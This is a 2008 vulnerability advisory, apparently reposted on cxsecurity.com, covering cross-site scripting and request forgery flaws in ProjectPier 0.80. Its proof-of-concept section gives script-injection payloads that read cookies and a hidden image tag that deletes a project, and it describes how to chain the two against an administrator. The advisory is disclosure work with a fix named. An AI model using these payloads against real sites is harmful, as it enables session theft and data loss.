ProjectPier <= 0.80 Cross Site Scripting and Request Forgery

2008.12.17
Credit: L4teral
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352

====================================================================== ProjectPier <= 0.80 Cross Site Scripting and Request Forgery ====================================================================== Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting Cross Site Request Forgery Status: patch available ------------------------------ Affected software description: ------------------------------ Application: ProjectPier Version: <= 0.80 Vendor: http://www.projectpier.org Description: ProjectPier is a Free, Open-Source, self-hosted PHP application for managing tasks, projects and teams through an intuitive web interface. ProjectPier will help your organization communicate, collaborate and get things done Its function is similar to commercial groupware/project management products, but allows the freedom and scalability of self-hosting. Even better, it will always be free. -------------- Vulnerability: -------------- 1. The login page is vulnerable to cross site scripting. 2. script code can be embedded into messages. 3. script code can be embedded into milestones. 4. script code can be embedded into a users display name. 5. The application is vulnerable to cross site request forgery. A project e.g. can be deleted with a simple GET request (see PoC). Combined with the XSS vulnerabilies, the code can be embedded into a message - if an admin views it, the browser will send the request to delete a project without being visible to the admin. ------------ PoC/Exploit: ------------ 1. http://localhost/projectpier/index.php?c=access"><script>alert('xss')</s cript>&a=login"><script>alert(document.cookie)</script> 2. create a message with <script>alert(document.cookie)</script> 3. create a milestone with <script>alert(document.cookie)</script> 4. set the display name in the profile to <script>alert(document.cookie)</script> 5. <img src="http://localhost/projectpier/index.php?c=project&a=delete&id=1&acti ve_project=1" width="0" height="0"> --------- Solution: --------- update to version 0.8.0.1 or above. --------- Timeline: --------- 2007-10-24 - vendor informed 2007-10-24 - vendor responded 2008-02-13 - vendor released new version 2008-02-17 - public disclosure

References:

http://www.projectpier.org/node/679


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top